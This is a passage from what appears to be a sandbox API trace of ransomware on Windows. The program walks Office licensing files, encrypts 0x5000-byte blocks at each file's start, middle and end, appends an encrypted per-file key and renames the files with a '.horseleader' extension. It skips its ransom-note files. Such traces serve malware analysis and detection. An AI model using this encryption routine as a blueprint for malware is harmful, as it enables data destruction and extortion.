(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.348] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.horseleader") returned 138 [0245.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms.horseleader")) returned 1 [0245.349] GetProcessHeap () returned 0x780000 [0245.349] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.349] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59948fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x212b00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPOBJS.DLL", cAlternateFileName="")) returned 1 [0245.349] lstrcmpiW (lpString1="OSPPOBJS.DLL", lpString2="Windows") returned -1 [0245.349] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned 96 [0245.349] StrStrIW (lpFirst="OSPPOBJS.DLL", lpSrch=".horseleader") returned 0x0 [0245.349] lstrcmpW (lpString1="OSPPOBJS.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.349] lstrcmpW (lpString1="OSPPOBJS.DLL", lpString2="_uninstalling_.png") returned 1 [0245.350] lstrlenW (lpString=".testttjffg") returned 11 [0245.350] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL", lpSrch=".testttjffg") returned 0x0 [0245.350] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.350] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.350] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned 96 [0245.351] StrStrW (lpFirst="OSPPOBJS.DLL", lpSrch=".txt") returned 0x0 [0245.351] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2173696) returned 1 [0245.351] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.351] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.354] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.355] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x106d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.355] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.359] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.359] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.359] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x20db00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.360] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.363] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.364] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.364] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.364] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.364] CloseHandle (hObject=0x158) returned 1 [0245.364] GetProcessHeap () returned 0x780000 [0245.364] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.364] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.horseleader") returned 108 [0245.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.horseleader")) returned 1 [0245.366] GetProcessHeap () returned 0x780000 [0245.366] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.366] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332800, ftCreationTime.dwHighDateTime=0x1cabc8a, ftLastAccessTime.dwLowDateTime=0x59948fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf332800, ftLastWriteTime.dwHighDateTime=0x1cabc8a, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPREARM.EXE", cAlternateFileName="OSPPRE~1.EXE")) returned 1 [0245.366] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="Windows") returned -1 [0245.366] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE") returned 97 [0245.366] StrStrIW (lpFirst="OSPPREARM.EXE", lpSrch=".horseleader") returned 0x0 [0245.366] lstrcmpW (lpString1="OSPPREARM.EXE", lpString2="#Decrypt#.txt") returned 1 [0245.366] lstrcmpW (lpString1="OSPPREARM.EXE", lpString2="_uninstalling_.png") returned 1 [0245.366] lstrlenW (lpString=".testttjffg") returned 11 [0245.366] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE", lpSrch=".testttjffg") returned 0x0 [0245.366] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.367] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.367] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE") returned 97 [0245.367] StrStrW (lpFirst="OSPPREARM.EXE", lpSrch=".txt") returned 0x0 [0245.367] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15712) returned 1 [0245.368] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3d60, lpOverlapped=0x0) returned 1 [0245.370] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc2a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.370] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3d60, lpOverlapped=0x0) returned 1 [0245.370] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.370] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.371] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.371] CloseHandle (hObject=0x158) returned 1 [0245.371] GetProcessHeap () returned 0x780000 [0245.371] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.371] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE.horseleader") returned 109 [0245.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe.horseleader")) returned 1 [0245.372] GetProcessHeap () returned 0x780000 [0245.372] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.372] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59995270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x4b2700, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPSVC.EXE", cAlternateFileName="")) returned 1 [0245.372] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="Windows") returned -1 [0245.372] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE") returned 95 [0245.372] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch=".horseleader") returned 0x0 [0245.372] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="#Decrypt#.txt") returned 1 [0245.372] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="_uninstalling_.png") returned 1 [0245.372] lstrlenW (lpString=".testttjffg") returned 11 [0245.372] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE", lpSrch=".testttjffg") returned 0x0 [0245.372] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.372] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE") returned 95 [0245.373] StrStrW (lpFirst="OSPPSVC.EXE", lpSrch=".txt") returned 0x0 [0245.373] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4925184) returned 1 [0245.373] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.373] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.376] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.377] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.378] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x256b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.378] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.381] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4ad700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.381] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.383] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.384] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.384] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.384] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.384] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.384] CloseHandle (hObject=0x158) returned 1 [0245.384] GetProcessHeap () returned 0x780000 [0245.385] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.385] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.horseleader") returned 107 [0245.385] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe.horseleader")) returned 1 [0245.386] GetProcessHeap () returned 0x780000 [0245.386] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.386] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59995270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x23b10, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPWMI.DLL", cAlternateFileName="")) returned 1 [0245.386] lstrcmpiW (lpString1="OSPPWMI.DLL", lpString2="Windows") returned -1 [0245.386] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL") returned 95 [0245.386] StrStrIW (lpFirst="OSPPWMI.DLL", lpSrch=".horseleader") returned 0x0 [0245.386] lstrcmpW (lpString1="OSPPWMI.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.386] lstrcmpW (lpString1="OSPPWMI.DLL", lpString2="_uninstalling_.png") returned 1 [0245.386] lstrlenW (lpString=".testttjffg") returned 11 [0245.386] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL", lpSrch=".testttjffg") returned 0x0 [0245.386] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.387] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL") returned 95 [0245.387] StrStrW (lpFirst="OSPPWMI.DLL", lpSrch=".txt") returned 0x0 [0245.387] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=146192) returned 1 [0245.388] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.388] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.390] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.390] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.391] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.392] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.392] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1eb10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.392] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.393] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.393] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.393] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.394] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.394] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.394] CloseHandle (hObject=0x158) returned 1 [0245.394] GetProcessHeap () returned 0x780000 [0245.394] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.394] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL.horseleader") returned 107 [0245.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft 